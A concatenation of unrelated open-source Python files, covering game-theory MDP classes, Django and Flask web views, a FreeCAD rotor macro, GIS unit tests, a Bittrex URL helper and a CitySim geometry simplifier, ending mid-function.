action = np.argmax(prescription1_table[self.history[0]])
belief = self.beliefs[prescription, action]
self.history += [prescription, belief]
elif len(self.history) == 3:
self.history.append(prescription)
def context(self) -> Optional[int]:
"""Return the public belief state
Before the coordinator has acted, there is only one public belief
state since the coordinator has no information. After the coordinator
has acted once, the public belief becomes the last item in `history`.
Note that the return values are bijective with the public belief states
rather than the public belief states themselves.
"""
return None if len(self.history) == 1 else self.history[-1]
def episode(self) -> list:
"""Return a list of (state, action, reward) PuB-MDP transitions"""
return [(None, self.history[1], 0), (*self.history[2:], self.payoff())]
def num_legal_actions(self) -> int:
"""Return the number of legal prescriptions"""
return self.num_prescriptions
def build(self, payoffs: np.ndarray) -> None:
"""Build the PuB-MDP corresponding to `payoffs`
Build the game by looping over all PuB-MDP trajectories.
Args:
payoffs : Payoff matrix indexed card1, card2, action1, action2
"""
num_possible_info_state = self.num_cards
self.num_prescriptions = self.num_actions ** num_possible_info_state
self.beliefs = {}
self.payoffs = {}
# First loop over the coordinator's initial prescriptions
for prescription1 in range(self.num_prescriptions):
prescription1_table = table_repr(
prescription1, self.num_cards, self.num_actions
)
# Then loop over the private obs for player 1
for c1 in range(self.num_cards):
# Public obs corresponding to the private obs `c1`
a1 = np.argmax(prescription1_table[c1])
# Posterior over player 1's private obs from coordinator's view
possible_c1 = np.flatnonzero(prescription1_table[:, a1])
# Corresponding public belief state
b = (tuple(possible_c1), a1)
self.beliefs[prescription1, a1] = b
for prescription2 in range(self.num_prescriptions):
prescription2_table = table_repr(
prescription2, self.num_cards, self.num_actions
)
tmp = []
# Payoff in PuB-MDP = expected payoff over public belief
for c1_ in possible_c1:
for c2_ in range(self.num_cards):
a2 = np.argmax(prescription2_table[c2_])
tmp.append(payoffs[c1_, c2_, a1, a2])
self.payoffs[c1, prescription1, b, prescription2] = np.mean(tmp)
class TBMDP(Game):
def __init__(self, payoffs: np.ndarray, optimal_return: float) -> None:
"""Temporal belief Markov decision process
Args:
See base class
Attributes:
See base class
payoffs (dict): The payoffs for the TB-MDP
legal_actions (dict): Maps temporal belief state to the number of
legal prescriptions.
"""
super().__init__(payoffs, optimal_return)
self.num_players = 1
self.horizon = 2
self.build(payoffs)
def start_states(self) -> tuple:
"""Return the start states
The TB-MDP is deterministic so there is only one start state.
"""
return ([],)
def step(self, action: int) -> None:
"""Append action to history"""
self.history.append(action)
def num_legal_actions(self) -> int:
"""Return the number of legal prescriptions
The size of the support of the temporal belief state varies based on
the first prescription. As a result, the number of legal second
prescriptions depends on the first prescription.
"""
if len(self.history) == 0:
return self.legal_actions[None]
return self.legal_actions[self.history[0]]
def context(self) -> Optional[int]:
"""Return the temporal belief state
Note that the return values (nothing on the first time step and the
first prescription on the second time step) are bijective with the
temporal belief states rather than the temporal belief states
themselves.
"""
if len(self.history) == 0:
return None
elif len(self.history) == 1:
return self.history[0]
raise (Exception)
def episode(self) -> list:
"""Return a list of (state, action, reward) TB-MDP transitions"""
return [
(None, self.history[0], 0),
(self.history[0], self.history[1], self.payoff()),
]
def build(self, payoffs: np.ndarray) -> None:
"""Build the TB-MDP corresponding to `payoffs`
Build the game by looping over all PuB-MDP trajectories.
Args:
payoffs : Payoff matrix indexed card1, card2, action1, action2
"""
self.payoffs = {}
self.legal_actions: Dict[Optional[int], int] = {}
num_possible_info_state1 = self.num_cards
num_prescriptions1 = self.num_actions ** num_possible_info_state1
self.legal_actions[None] = num_prescriptions1
# First loop over the coordinator's initial prescriptions
for prescription1 in range(num_prescriptions1):
prescription1_table = table_repr(
prescription1, self.num_cards, self.num_actions
)
# Compute possible obs for player 2
possible_a1 = np.flatnonzero(prescription1_table.max(axis=0))
# Compute possible info states for player 2
num_possible_info_state2 = self.num_cards * len(possible_a1)
# Compute number of legal prescriptions for coordinator
num_legal_actions2 = self.num_actions ** num_possible_info_state2
self.legal_actions[prescription1] = num_legal_actions2
for prescription2 in range(num_legal_actions2):
prescription2_table = table_repr(
prescription2, num_possible_info_state2, self.num_actions
)
# Indexing the rows of the second prescription table takes a
# bit more work because they are indexed by both the player 2's
# card and player 1's action.
idx = {
(c2_, a1_): i
for i, (c2_, a1_) in enumerate(
itertools.product(range(self.num_cards), possible_a1)
)
}
tmp = []
# Payoff in TB-MDP = expected payoff over temporal belief
for c1_ in range(self.num_cards):
for c2_ in range(self.num_cards):
a1_ = np.argmax(prescription1_table[c1_])
a2_ = np.argmax(prescription2_table[idx[(c2_, a1_)]])
tmp.append(payoffs[c1_, c2_, a1_, a2_])
self.payoffs[prescription1, prescription2] = np.mean(tmp)
class VBMDP(Game):
def __init__(self, payoffs: np.ndarray, optimal_return: float) -> None:
"""Vacuous belief Markov decision process
Args:
See base class
Attributes:
See base class
payoffs (dict): The payoffs for the VB-MDP
num_action_profiles (int): The number of action profiles
"""
super().__init__(payoffs, optimal_return)
self.num_players = 1
self.horizon = 1
self.build(payoffs)
def start_states(self) -> tuple:
"""Return the start states
There is only one start state for the VB-MDP.
"""
return ([],)
def context(self) -> None:
"""Return the one belief state
As the name suggests, there is only one belief state in the VB-MDP.
Note that we are returning something bijective with it, rather than
actually computing it.
"""
return None
def step(self, action: int) -> None:
"""Append `action` to `history`"""
self.history.append(action)
def num_legal_actions(self) -> int:
"""Return number of legal prescriptions"""
return self.num_action_profiles
def episode(self) -> list:
"""Return list of (start, action, reward) VB-MDP transitions"""
return [(None, self.history[0], self.payoff())]
def build(self, payoffs: np.ndarray) -> None:
"""Build the VB-MDP corresponding to `payoffs`
Build the game by looping over all VB-MDP trajectories.
Args:
payoffs: Payoff matrix indexed card1, card2, action1, action2
"""
self.payoffs = {}
num_cards = payoffs.shape[0]
num_actions = payoffs.shape[-1]
num_p1_info_states = num_cards
num_p2_info_states = num_cards * num_actions
num_info_states = num_p1_info_states + num_p2_info_states
num_p1_action_profiles = num_actions ** num_p1_info_states
num_p2_action_profiles = num_actions ** num_p2_info_states
# Number of action profiles
self.num_action_profiles = num_p1_action_profiles * num_p2_action_profiles
# Loop over action profiles
for action_profile in range(self.num_action_profiles):
action_profile_table = table_repr(
action_profile, num_info_states, num_actions
)
tmp = []
# Payoff in VB-MDP is expected payoff over the one belief state
for c1 in range(num_cards):
for c2 in range(num_cards):
a1 = np.argmax(action_profile_table[c1])
p2_info_state_idx = num_cards + a1 * num_cards + c2
a2 = np.argmax(action_profile_table[p2_info_state_idx])
tmp.append(payoffs[c1, c2, a1, a2])
self.payoffs[(action_profile,)] = np.mean(tmp)
def table_repr(index: int, num_info_states: int, num_actions: int) -> np.ndarray:
"""Express prescription with a table representation.
Args:
index: Index of the prescription
num_info_states: Number of possible info state
num_actions: Number of legal actions
Returns:
`num_states` by `num_actions` representation of prescription where
(i, j) -> prescribed probabiliy of action j given infostate i.
"""
table = np.zeros((num_info_states, num_actions))
for info_state in range(num_info_states):
table[info_state, index % num_actions] = 1
index = index // num_actions
return table
| 3.78125 | 4 |
src/ssm_document_generator/definition/parameters/parameter.py | awslabs/aws-systems-manager-document-generator | 54 | 12773192 | <filename>src/ssm_document_generator/definition/parameters/parameter.py
from ssm_document_generator import utils
class Parameter:
def __init__(self, name, description='', parameter_type='String', default=None, allowed_pattern=None):
self.name = name
self.parameter_type = parameter_type
self.description = description
self.default = default
self.allowed_pattern = allowed_pattern
def get_dict(self):
return utils.dict_without_none_entries({'type': self.parameter_type,
'description': self.description,
'allowedPattern': self.allowed_pattern,
'default': self.default})
def add_to_dict(self, params_dict):
params_dict[self.name] = self.get_dict()
| 2.40625 | 2 |
test/geo/layer/test_parcel.py | Crashillo/CatAtom2Osm | 0 | 12773193 | import logging
import unittest
import mock
from qgis.core import QgsVectorLayer
from catatom2osm.app import QgsSingleton
from catatom2osm.geo.geometry import Geometry
from catatom2osm.geo.layer.cons import ConsLayer
from catatom2osm.geo.layer.parcel import ParcelLayer
qgs = QgsSingleton()
m_log = mock.MagicMock()
m_log.app_level = logging.INFO
class TestParcelLayer(unittest.TestCase):
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
def setUp(self):
fn = "test/fixtures/parcel.gpkg|layername=parcel"
self.parcel = ParcelLayer("38012")
fixture = QgsVectorLayer(fn, "parcel", "ogr")
self.assertTrue(fixture.isValid(), "Loading fixture")
self.parcel.append(fixture)
self.assertEqual(self.parcel.featureCount(), 186)
fn = "test/fixtures/cons.gpkg|layername=cons"
fixture2 = QgsVectorLayer(fn, "cons", "ogr")
self.building = ConsLayer("MultiPolygon", "cons", "memory")
self.building.append(fixture2)
self.assertTrue(self.building.isValid(), "Loading fixture")
def test_init(self):
layer = ParcelLayer("38012")
self.assertEqual(layer.fields()[0].name(), "localId")
self.assertEqual(layer.fields()[1].name(), "parts")
self.assertEqual(layer.rename["localId"], "inspireId_localId")
def test_not_empty(self):
layer = ParcelLayer("38012")
self.assertGreater(len(layer.fields().toList()), 0)
def test_delete_void_parcels(self):
self.parcel.delete_void_parcels(self.building)
self.assertEqual(self.parcel.featureCount(), 110)
def test_create_missing_parcels(self):
self.parcel.create_missing_parcels(self.building)
self.assertEqual(self.parcel.featureCount(), 188)
p = next(self.parcel.search("localId = '8642317CS5284S'"))
self.assertEqual(len(Geometry.get_multipolygon(p)[0]), 1)
def test_get_groups_by_adjacent_buildings(self):
self.parcel.create_missing_parcels(self.building)
pa_groups, pa_refs, __ = self.parcel.get_groups_by_adjacent_buildings(
self.building
)
self.assertEqual(len(pa_groups), 21)
self.assertEqual(sum([len(gr) for gr in pa_groups]), 85)
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_merge_by_adjacent_buildings(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
self.parcel.count_parts(self.building)
pca = sum([f["parts"] for f in self.parcel.getFeatures()])
la = self.parcel.featureCount()
tasks = self.parcel.merge_by_adjacent_buildings(self.building)
pcd = sum([f["parts"] for f in self.parcel.getFeatures()])
ld = self.parcel.featureCount()
cl = len([k for k, v in tasks.items() if k != v])
self.assertEqual(ld, la - cl)
self.assertEqual(pca, pcd)
pa_refs = [f["localId"] for f in self.parcel.getFeatures()]
expected = [
"001000300CS52D",
"001000400CS52D",
"8641608CS5284S",
"8641612CS5284S",
"8641613CS5284S",
"8641616CS5284S",
"8641620CS5284S",
"8641621CS5284S",
"8641632CS5284S",
"8641636CS5284S",
"8641638CS5284S",
"8641649CS5284S",
"8641653CS5284S",
"8641658CS5284S",
"8641660CS5284S",
"8642302CS5284S",
"8642310CS5284S",
"8642312CS5284S",
"8642313CS5284S",
"8642314CS5284S",
"8642317CS5284S",
"8642321CS5284S",
"8642325CS5484N",
"8642701CS5284S",
"8742701CS5284S",
"8742707CS5284S",
"8742711CS5284S",
"8742721CS5284S",
"8839301CS5283N",
"8840501CS5284S",
"8841602CS5284S",
"8841603CS5284S",
"8844121CS5284S",
"8940301CS5284S",
"8940302CS5284S",
"8940305CS5284S",
"8940306CS5284S",
"8940307CS5284S",
"8940309CS5284S",
"8941505CS5284S",
"9041703CS5294S",
"9041704CS5294S",
"9041705CS5294S",
"9041716CS5294S",
"9041719CS5294S",
"9042401CS5294S",
"9042402CS5294S",
"9042404CS5294S",
]
self.assertEqual(pa_refs, expected)
f = next(self.parcel.search("localId = '8840501CS5284S'"))
self.assertEqual(f["parts"], 11)
merged = []
for bu in self.building.getFeatures():
if self.building.is_building(bu):
ref = self.building.get_id(bu)
if ref not in pa_refs:
merged.append(ref)
self.assertEqual(len(merged), 71)
self.assertTrue(all([tasks[ref] != ref for ref in merged]))
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_count_parts(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
parts_count = self.parcel.count_parts(self.building)
self.assertEqual(sum(parts_count.values()), 324)
self.assertEqual(len(parts_count), self.parcel.featureCount())
f = next(self.parcel.search("localId = '8840501CS5284S'"))
self.assertEqual(f["parts"], 7)
self.assertEqual(parts_count["8840501CS5284S"], 7)
f = next(self.parcel.search("localId = '8840502CS5284S'"))
self.assertEqual(f["parts"], 4)
self.assertEqual(parts_count["8840502CS5284S"], 4)
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_get_groups_by_parts_count(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
self.parcel.count_parts(self.building)
self.parcel.merge_by_adjacent_buildings(self.building)
features = {pa.id(): pa for pa in self.parcel.getFeatures()}
(
pa_groups,
pa_refs,
geometries,
parts_count,
) = self.parcel.get_groups_by_parts_count(10, 100)
self.assertEqual(len(parts_count), 48)
self.assertEqual(len(pa_groups), 18)
self.assertTrue(
all(
[
sum([parts_count[pa_refs[fid]] for fid in group]) <= 10
for group in pa_groups
]
)
)
label_count = set(
[
len(set([self.parcel.get_zone(features[fid]) for fid in group]))
for group in pa_groups
]
)
self.assertEqual(label_count, {1})
@mock.patch("catatom2osm.geo.layer.base.tqdm", mock.MagicMock())
@mock.patch("catatom2osm.geo.layer.base.log", m_log)
@mock.patch("catatom2osm.geo.layer.polygon.log", m_log)
def test_merge_by_parts_count(self):
self.building.remove_outside_parts()
self.building.explode_multi_parts()
self.building.clean()
self.parcel.delete_void_parcels(self.building)
self.parcel.create_missing_parcels(self.building)
self.parcel.merge_by_adjacent_buildings(self.building)
pca = sum([f["parts"] for f in self.parcel.getFeatures()])
la = self.parcel.featureCount()
tasks = self.parcel.merge_by_parts_count(20, 30)
pcd = sum([f["parts"] for f in self.parcel.getFeatures()])
ld = self.parcel.featureCount()
cl = len([k for k, v in tasks.items() if k != v])
self.assertEqual(ld, la - cl)
self.assertEqual(pca, pcd)
| 2.515625 | 3 |
voting/urls.py | Tatuska23/hlasovani | 0 | 12773194 | <reponame>Tatuska23/hlasovani<filename>voting/urls.py
from django.conf.urls import url
from voting import views
## Seznam adres které projekt obsahuje, a funkcí adresy obsluhují.
## Úvod do urlpatterns je v myfirstapp/urls.py.
urlpatterns = [
## Prázdná adresa (^ - začátek řetězce, $ - konec řetězce) se zpracuje
## funkcí "poll_list" z views.py.
## Tahle funkce vrací stránku se seznamem všech hlasování.
url(r'^$', views.poll_list, name='poll_list'),
## Adresa jako "polls/123" se zpracuje funkcí "poll_detail" z views.py.
## Tahle funkce bere argument "pk" (proto ono "(?P<pk>" v regulárním
## výrazu), a vrátí stránku pro odpovídající hlasování.
url(r'^polls/(?P<pk>\d+)$', views.poll_detail, name='poll_detail'),
url(r'^info/', views.info, name='info_o_projektu'),
url(r'^polls/(?P<pk>\d+)/nova_moznost/', views.moznost, name='pridani_moznosti'),
]
| 2.1875 | 2 |
kivy/input/provider.py | sirpercival/kivy | 317 | 12773195 | '''
Motion Event Provider
=====================
Abstract class for the implemention of a
:class:`~kivy.input.motionevent.MotionEvent`
provider. The implementation must support the
:meth:`~MotionEventProvider.start`, :meth:`~MotionEventProvider.stop` and
:meth:`~MotionEventProvider.update` methods.
'''
__all__ = ('MotionEventProvider', )
class MotionEventProvider(object):
'''Base class for a provider.
'''
def __init__(self, device, args):
self.device = device
if self.__class__ == MotionEventProvider:
raise NotImplementedError('class MotionEventProvider is abstract')
def start(self):
'''Start the provider. This method is automatically called when the
application is started and if the configuration uses the current
provider.
'''
pass
def stop(self):
'''Stop the provider.
'''
pass
def update(self, dispatch_fn):
'''Update the provider and dispatch all the new touch events though the
`dispatch_fn` argument.
'''
pass
| 2.625 | 3 |
auth/__init__.py | pfspontus/lexwheels | 0 | 12773196 | <reponame>pfspontus/lexwheels
"""
User authentication views
"""
import functools
from flask import Blueprint
from flask import g
from flask import redirect
from flask import request
from flask import url_for
from auth import views
define = views.define
auth_page = Blueprint('auth', __name__, url_prefix='/auth',
template_folder='templates')
def login_required(view):
"""
Wrapper to decorate given view, enforcing authentication.
"""
@functools.wraps(view)
def wrapped_view(**kwargs):
if g.user is None:
return redirect(url_for('auth.login', next=request.url))
return view(**kwargs)
return wrapped_view
| 2.578125 | 3 |
Patent_US20020125774A1_Molina_Martinez_Generator/Version_1/part_rotor.py | Jay4C/Python-Macros-For_FreeCAD | 0 | 12773197 | import FreeCAD, Part, Drawing, math, Mesh, importDXF
DOC = FreeCAD.activeDocument()
DOC_NAME = "part_rotor"
def clear_doc():
# Clear the active document deleting all the objects
for obj in DOC.Objects:
DOC.removeObject(obj.Name)
def setview():
# Rearrange View
FreeCAD.Gui.SendMsgToActiveView("ViewFit")
FreeCAD.Gui.activeDocument().activeView().viewAxometric()
if DOC is None:
FreeCAD.newDocument(DOC_NAME)
FreeCAD.setActiveDocument(DOC_NAME)
DOC = FreeCAD.activeDocument()
else:
clear_doc()
# EPS= tolerance to use to cut the parts
EPS = 0.10
EPS_C = EPS * (-0.5)
maximal_diameter = 100
# part_rotor
part_rotor = Part.makeCylinder(maximal_diameter/2 - 5 - 5 - 5, 1)
# part_rotor cut by cylinder_1
cylinder_1 = Part.makeCylinder(2.5, 1)
part_rotor = part_rotor.cut(cylinder_1)
# holes for fixing the rotors
degre = 180
for i in range(int(360/degre)):
radius = 2.5 + 10 + 2.5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(2.5, 1)
hole.translate(hole_vector)
part_rotor = part_rotor.cut(hole)
# holes for fixing the wires
degre = 30
for i in range(int(360/degre)):
radius = maximal_diameter/2 - 5 - 5 - 5
alpha=(i*degre*math.pi)/180
hole_vector = FreeCAD.Vector(radius*math.cos(alpha), radius*math.sin(alpha), 0)
hole = Part.makeCylinder(6.5, 1)
hole.translate(hole_vector)
part_rotor = part_rotor.cut(hole)
Part.show(part_rotor)
DOC.recompute()
__objs__ = []
__objs__.append(FreeCAD.getDocument("part_rotor").getObject("Shape"))
stl_file = u"part_rotor.stl"
Mesh.export(__objs__, stl_file)
dxf_file = u"part_rotor.dxf"
importDXF.export(__objs__, dxf_file)
setview()
| 2.65625 | 3 |
hknweb/candidate/views/mass_add_cands.py | Boomaa23/hknweb | 0 | 12773198 | import csv
from collections import OrderedDict
import threading
import time
from typing import Tuple
from django.http import Http404, JsonResponse
from django.shortcuts import render
from django.conf import settings
from django.contrib.auth.models import BaseUserManager, Group, User
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
from hknweb.thread.models import ThreadTask
from hknweb.utils import login_and_permission, get_rand_photo
from hknweb.models import Profile
from hknweb.views.users import get_current_cand_semester
from hknweb.candidate.constants import (
ATTR,
CandidateDTO,
DEFAULT_RANDOM_PASSWORD_LENGTH,
)
@login_and_permission("auth.add_user")
def create_candidates_view(request):
"""
View for creating multiple candidates given a CSV of their information
See "add_cands" for more details
"""
return render(request, "candidate/create_candidates.html")
@login_and_permission("auth.add_user")
def add_cands(request):
if request.method != ATTR.POST:
raise Http404()
cand_csv_file = request.FILES.get(ATTR.CAND_CSV, None)
if cand_csv_file is None:
return JsonResponse(
{
"success": False,
"id": -1,
"message": "No file detected (can be internal error)",
}
)
if not cand_csv_file.name.endswith(ATTR.CSV_ENDING):
return JsonResponse(
{"success": False, "id": -1, "message": "Please input a csv file!"}
)
decoded_cand_csv_file = cand_csv_file.read().decode(ATTR.UTF8SIG).splitlines()
cand_csv = csv.DictReader(decoded_cand_csv_file)
num_rows = sum(1 for _ in csv.DictReader(decoded_cand_csv_file))
website_login_link = request.build_absolute_uri("/accounts/login/")
task_id = spawn_threaded_add_cands_and_email(cand_csv, website_login_link, num_rows)
return JsonResponse({"success": True, "id": task_id, "message": ""})
@login_and_permission("auth.add_user")
def check_mass_candidate_status(request, id):
task = ThreadTask.objects.get(pk=id)
return JsonResponse(
{
"progress": task.progress,
"message": task.message,
"is_successful": task.is_successful,
"is_done": task.is_done,
}
)
NO_ACTION_PLS_FIX = "No candidate account actions have been taken, so re-upload the entire file after fixing the errors."
def spawn_threaded_add_cands_and_email(cand_csv, website_login_link, num_rows):
"""
Spawn a single background thread to provision candidate
"""
task = ThreadTask()
task.save()
t = threading.Thread(
target=threaded_add_cands_and_email,
args=[cand_csv, num_rows, website_login_link, task],
)
task.startThread(t)
return task.id
def threaded_add_cands_and_email(cand_csv, num_rows, website_login_link, task):
try:
result, msg = add_cands_and_email(cand_csv, num_rows, website_login_link, task)
except Exception as e:
result = False
msg = str(e)
task.message = msg
if result:
task.complete()
else:
task.failure()
task.progress = 100
task.save()
def check_duplicates(
candidatedto: CandidateDTO,
row: OrderedDict,
email_set: set,
username_set: set,
i: int,
) -> Tuple[bool, str]:
error_msg = ""
# Check for duplicate Email
cand_email_in_set = candidatedto.email in email_set
if cand_email_in_set or User.objects.filter(email=candidatedto.email).count() > 0:
if cand_email_in_set:
error_msg = "Duplicate email {} in the Candidate data.".format(
candidatedto.email
)
else:
error_msg = "Account with email {} already exists.".format(
candidatedto.email
)
error_msg += " "
error_msg += "No candidate account actions have been taken, so re-upload the entire file after fixing the errors."
error_msg += " "
error_msg += "Error Row Information at row {}: {}.".format(i + 1, row)
return True, error_msg
# Check for duplicate Username
cand_username_in_set = candidatedto.username in username_set
if (
cand_username_in_set
or User.objects.filter(username=candidatedto.username).count() > 0
):
if cand_username_in_set:
error_msg = "Duplicate username {} in the Candidate data.".format(
candidatedto.username
)
else:
error_msg = "Account of username {} already exists.".format(
candidatedto.username
)
error_msg += " "
error_msg += "No candidate account actions have been taken, so re-upload the entire file after fixing the errors."
error_msg += " "
error_msg += "Error Row Information at row {}: {}.".format(i + 1, row)
return True, error_msg
return False, ""
def add_cands_and_email(cand_csv, num_rows, website_login_link, task=None):
candidate_group = Group.objects.get(name=ATTR.CANDIDATE)
progress_float = 0.0
CAND_ACC_WEIGHT = 0.75
EMAIL_WEIGHT = 0.25
# Sanity check progress
if task is not None:
task.progress = 1.0
task.save()
# Pre-screen and validate data
new_cand_list = []
email_set = set()
username_set = set()
current_cand_semester = get_current_cand_semester()
email_passwords = {}
if current_cand_semester is None:
error_msg = "Inform CompServ the following: Please add the current semester in CourseSemester."
error_msg += " "
error_msg += NO_ACTION_PLS_FIX
return False, error_msg
for i, row in enumerate(cand_csv):
try:
candidatedto = CandidateDTO(row)
except AssertionError as e:
error_msg = "Invalid CSV format. Check that your columns are correctly labeled, there are NO blank rows, and filled out for each row."
error_msg += " "
error_msg += NO_ACTION_PLS_FIX
error_msg += " "
error_msg += "Candidate error message: {}.".format(e)
error_msg += " "
error_msg += "Row Information at row {}: {}.".format(i + 1, row)
return False, error_msg
password = BaseUserManager.make_random_password(
None, length=DEFAULT_RANDOM_PASSWORD_LENGTH
)
duplicate, error_msg = check_duplicates(
candidatedto, row, email_set, username_set, i
)
if duplicate:
return False, error_msg
new_cand = User(
username=candidatedto.username,
email=candidatedto.email,
)
email_set.add(candidatedto.email)
username_set.add(candidatedto.username)
new_cand.first_name = candidatedto.first_name
new_cand.last_name = candidatedto.last_name
new_cand.set_password(password)
new_cand_list.append(new_cand)
email_passwords[new_cand.email] = password
progress_float = CAND_ACC_WEIGHT * 100 * (i + 1) / num_rows
if task is not None:
task.progress = round(progress_float)
task.save()
# Reset to CAND_ACC_WEIGHT in case floating point errors
progress_float = CAND_ACC_WEIGHT * 100
if task is not None:
task.progress = round(progress_float)
task.save()
num_of_accounts = len(email_set)
if num_of_accounts != num_rows:
error_msg = (
"Internal Error: number of accounts ({}) != number of rows ({})".format(
num_of_accounts, num_rows
)
)
error_msg += " "
error_msg += NO_ACTION_PLS_FIX
return False, error_msg
# Release the memory once done
del email_set
del username_set
email_errors = []
for i, new_cand in enumerate(new_cand_list):
if i != 0 and i % 50 == 0:
time.sleep(10)
new_cand.save()
candidate_group.user_set.add(new_cand)
profile = Profile.objects.get(user=new_cand)
profile.candidate_semester = current_cand_semester
profile.save()
subject = "[HKN] Candidate account"
html_content = render_to_string(
"candidate/new_candidate_account_email.html",
{
"subject": subject,
"first_name": new_cand.first_name,
"username": new_cand.username,
"password": email_passwords[new_cand.email],
"website_link": website_login_link,
"img_link": get_rand_photo(),
},
)
if settings.DEBUG:
print("\n")
print(new_cand.first_name, new_cand.username, new_cand.email)
print(html_content)
print("\n")
else:
msg = EmailMultiAlternatives(
subject, subject, settings.NO_REPLY_EMAIL, [new_cand.email]
)
msg.attach_alternative(html_content, "text/html")
try:
msg.send()
except Exception as e:
email_errors.append((new_cand_list[i].email, str(e)))
progress_float = (CAND_ACC_WEIGHT * 100) + (
EMAIL_WEIGHT * 100 * (i + 1) / num_of_accounts
)
if task is not None:
task.progress = round(progress_float)
task.save()
# If gone through everything and no errors
if len(email_errors) > 0:
error_msg = (
"An error occured during the sending of emails. "
+ "Candidate Email and Error Messages: "
+ str(email_errors)
+ " --- "
+ "Inform CompServ of the errors, and inform the candidates "
+ "to access their accounts by resetting their password "
+ 'using "Forget your password?" in the Login page. '
+ "All {} candidates added!".format(num_of_accounts)
)
return False, error_msg
else:
return True, "Successfully added {} candidates!".format(num_of_accounts)
| 2.15625 | 2 |
bittrex_api/utils/urls.py | kkristof200/py_bittrex_api | 18 | 12773199 | <reponame>kkristof200/py_bittrex_api<gh_stars>10-100
# --------------------------------------------------------------- Imports ----------------------------------------------------------------#
# System
from typing import Optional, Dict, Any
# Local
from . import strings
# ----------------------------------------------------------------------------------------------------------------------------------------#
# ------------------------------------------------------------- class: Urls --------------------------------------------------------------#
class Urls:
# ------------------------------------------------------------- Init -------------------------------------------------------------#
def __init__(
self,
base_url: str
):
self.base_url = base_url.strip('/')
# -------------------------------------------------------- Public methods --------------------------------------------------------#
@staticmethod
def join(*args) -> str:
comps = []
for arg in args:
if arg is not None:
comps.append(strings.to_string(arg).strip('/'))
return '/'.join(comps)
def url(
self,
*endpoints_args,
params: Optional[Dict] = None,
use_nonce: bool = True
) -> str:
endpoints_args = (self.base_url,) + endpoints_args
url = self.join(*endpoints_args)
if use_nonce and (params is None or 'nonce' not in params):
if params is None:
params = {}
from . import crypto
params['nonce'] = crypto.nonce()
if params is None:
return url
to_append = ''
for key, value in params.items():
if value is None:
continue
if len(to_append) == 0:
to_append += '?'
else:
to_append += '&'
to_append += strings.to_string(key) + '=' + strings.to_string(value)
return url + to_append
# ----------------------------------------------------------------------------------------------------------------------------------------# | 1.859375 | 2 |
app/app_builder.py | cupskeee/App-MFE | 0 | 12773200 | import datetime
from flask import Flask, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from app.extensions.db import db
# from app.models import User
app = Flask(__name__)
app.config.from_object('config')
db.init_app(app)
# user_manager = UserManager(app, db, User)
# login_manager = LoginManager()
# login_manager.login_view = 'home.login'
# login_manager.init_app(app)
# QRcode(app, mode="google")
# @login_manager.user_loader
# def load_user(user_id):
# return User.query.get(user_id)
#
# @login_manager.unauthorized_handler
# def handle_needs_login():
# return redirect(url_for('home.login', msg="You have to be logged in to access this page."))
@app.context_processor
def inject_today_date():
return {'current_date': datetime.date.today()} | 2.703125 | 3 |
simplifycitysimgeometry.py | architecture-building-systems/design-performance-workflows | 5 | 12773201 | <gh_stars>1-10
'''
simplifycitysimgeometry.py
Using a similar algorithm to shading.py, simplify rectangles in
the CitySim xml file by combining walls that belong to the same
building and zone and have the same construction information.
Take special care with opacity...
'''
from eppy.geometry.surface import tilt, angle2vecs, area
from lxml import etree
import numpy as np
import itertools
def simplify(citysim_xml):
to_delete = simplify_one_level(collect_walls(citysim_xml))
while len(to_delete):
for wall in to_delete:
wall.getparent().remove(wall)
to_delete = simplify_one_level(collect_walls(citysim_xml))
return citysim_xml
def simplify_one_level(walls):
'''
run one pass of simplifications - this needs to be repeated until
no more simplifications are found
to_delete is a set of names of shading surfaces that were simplified.
'''
to_delete = set()
print 'simplify_one_level', len(walls)
for wa, wb in itertools.combinations(walls, 2):
if not same_zone(wa, wb):
continue
if not same_construction(wa, wb):
continue
if wa in to_delete or wb in to_delete:
# one of these has already been merged!
continue
pa = get_polygon(wa)
pb = get_polygon(wb)
if len(points_in_common(pa, pb)) != 2:
# ignore these as they can't possibly share an edge
continue
pa = canonical_rotation(pa)
pb = canonical_rotation(pb)
if np.isclose(pa[0][2], pb[0][2]):
# not above each other...
continue
# swap the two polygons so that pa is the upper and pb the lower
# polygon - that way we can always index them the same:
# a1 ----- a2
# | |
# | |
# a0 ----- a3 (a0 == b1, a3 == b2)
# | |
# | |
# b0 ----- b3
if pa[0][2] < pb[0][2]:
wa, wb = wb, wa
pa, pb = pb, pa
pnew = [pb[0], pa[1], pa[2], pb[3]]
set_polygon(wa, pnew)
wa.set('Area', str(area(pnew)))
merge_windows(wa, wb)
to_delete.add(wb)
print '-', wa.get('id'), wb.get('id')
return to_delete
def canonical_rotation(polygon):
'''
for our algorithm, a canonically rotated polygon
has polygon = [a, b, c, d] with:
a.z < b.z
a.z == d.z
b.z == c.z
c.z > d.z
that is, the first vertex is a lower corner and
the next vertex an upper corner.
'''
assert len(polygon) == 4, 'only for rectangles!'
def only_two_z_values(polygon):
zs = set(v[2] for v in polygon)
for z0, z1 in itertools.combinations(zs, 2):
if np.isclose(z0, z1) and z0 in zs:
zs.remove(z0)
return len(zs) == 2
assert only_two_z_values(polygon), 'only two z-values allowed! %s' % set(v[2] for v in polygon) # noqa
def is_canonical(polygon):
a, b, c, d = polygon
return all((a[2] < b[2],
